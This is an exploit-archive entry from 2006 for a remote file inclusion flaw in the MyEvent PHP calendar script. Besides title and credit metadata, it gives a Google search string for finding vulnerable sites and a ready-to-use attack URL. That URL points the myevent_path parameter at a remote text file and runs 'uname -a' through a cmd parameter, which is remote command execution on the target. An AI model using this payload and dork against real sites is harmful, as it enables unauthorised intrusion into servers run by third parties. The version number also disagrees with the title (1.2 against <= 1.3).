[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability
# Published : 2006-04-17
# Author : botan
# Previous Title : ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit
# Next Title : Fuju News 1.0 Authentication Bypass / Remote SQL Injection Exploit
Script : MyEvent
Version : 1.2
Risk : High
Class : Remote
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php"
http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a
# www.Syue.com [2006-04-17]